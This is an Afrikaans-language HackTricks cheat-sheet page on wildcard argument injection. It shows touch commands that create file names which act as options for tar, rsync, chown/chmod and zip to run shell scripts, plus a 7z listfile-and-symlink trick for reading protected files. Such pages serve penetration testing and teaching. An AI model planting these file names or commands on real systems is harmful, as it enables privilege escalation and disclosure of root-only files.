Wildcards Spare tricks

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

chown, chmod

Jy kan aandui watter lêiereienaar en toestemmings jy wil kopieer vir die res van die lêers

touch "--reference=/my/own/path/filename"

Jy kan dit uitbuit deur gebruik te maak van https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (gekombineerde aanval) Meer inligting in https://www.exploit-db.com/papers/33930

Tar

Voer willekeurige opdragte uit:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Jy kan dit uitbuit deur gebruik te maak van https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar aanval) Meer inligting in https://www.exploit-db.com/papers/33930

Rsync

Voer willekeurige opdragte uit:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Jy kan dit uitbuit deur gebruik te maak van https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (rsync-aanval) Meer inligting in https://www.exploit-db.com/papers/33930

7z

In 7z kan jy selfs deur -- voor * te gebruik (let daarop dat -- beteken dat die volgende inset nie as parameters behandel kan word nie, so net lêernaamspaaie in hierdie geval) 'n willekeurige fout veroorsaak om 'n lêer te lees, so as 'n opdrag soos die volgende deur root uitgevoer word:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

En jy kan lêers in die gids waar dit uitgevoer word, skep. Jy kan die lêer @root.txt en die lêer root.txt skep as 'n symlink na die lêer wat jy wil lees:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Dan, wanneer 7z uitgevoer word, sal dit root.txt behandel as 'n lêer wat die lys van lêers bevat wat dit moet komprimeer (dit is wat die bestaan van @root.txt aandui) en wanneer 7z root.txt lees, sal dit /file/you/want/to/read lees en aangesien die inhoud van hierdie lêer nie 'n lys van lêers is nie, sal dit 'n fout veroorsaak wat die inhoud wys.

Meer inligting in Write-ups van die boks CTF van HackTheBox.

Zip

Voer willekeurige opdragte uit:

zip name.zip files -T --unzip-command "sh -c whoami"
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated